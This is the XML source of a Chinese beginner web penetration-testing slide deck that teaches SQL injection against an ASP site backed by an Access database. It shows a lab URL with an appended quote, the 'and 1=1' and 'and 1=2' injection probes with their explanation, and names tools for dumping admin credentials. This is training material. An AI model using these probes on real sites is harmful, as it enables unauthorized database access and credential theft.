                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>字符串的语法错误 在查询表达式 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>'ID=49'' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/showdetail.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>网站使用的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>数据库，通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>JET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>引擎连接数据库，而不是通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ODBC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>程序没有判断客户端提交的数据是否符合程序要求。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>语句所查询的表中有一名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的字段。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13319" name="Picture 7" descr="24114524a98cd92fe19094b11f659717a53706bd"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="28582" b="19971"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="4653136"/>
            <a:ext cx="5040312" cy="1296144"/>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539751" y="981075"/>
            <a:ext cx="7344618" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>判断参数是否存在注入点加单引号，如果报错可能存在注入点</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>192.168.1.23:90/pro_detail.asp?id=74%27</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14338" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="13167" b="63749"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="611560" y="1981418"/>
            <a:ext cx="6173510" cy="1872207"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339"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判断是否存在注入点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" pitchFamily="3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539750" y="908050"/>
            <a:ext cx="7561263" cy="3140075"/>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And 1=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>或者 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>and 1=2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>看返回页面，判断是否存在注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>And 1=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>这个表达式为真，所以返回正常页面</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">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en-US" altLang="zh-CN">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363"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判断是否存在注入点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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844824"/>
            <a:ext cx="6205527" cy="466332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539750" y="981075"/>
            <a:ext cx="7561263" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>And 1=2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>这个表达式为假，所以返回和上面不一样的页面。由此我们可以看出这个地方存在注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16386" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1043608" y="1772816"/>
            <a:ext cx="6696099" cy="4568312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="260350"/>
            <a:ext cx="22415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判断是否存在注入点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑"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539750" y="981075"/>
            <a:ext cx="7561263"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知道存在注入点后，我们可以利用注入工具跑出网站后台账号、密码。常用注入工具：啊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入工具、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQLMAP</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Pangolin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Havij</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17410" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1691680" y="1772816"/>
            <a:ext cx="5040982" cy="4709107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17411" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="260350"/>
            <a:ext cx="2012950" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入工具获取数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition/>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="毕业论文答辩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Metro">
      <a:majorFont>
        <a:latin typeface="Arial"/>
        <a:ea typeface="微软雅黑"/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial"/>
        <a:ea typeface="微软雅黑"/>
        <a:cs typeface=""/>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1821</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>228</Paragraphs>
  <Slides>36</Slides>
  <Notes>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毕业论文答辩PPT​​</vt:lpstr>
      <vt:lpstr>Web渗透测试（初级）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成都安思科技</dc:title>
  <dc:creator>Yao.Zhang</dc:creator>
  <dc:description>企业介绍模版</dc:description>
  <cp:lastModifiedBy>ansec</cp:lastModifiedBy>
  <cp:revision>1188</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-03-20T08:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-02-03T03:14:48Z</dcterms:modified>
  <cp:category>PPT模板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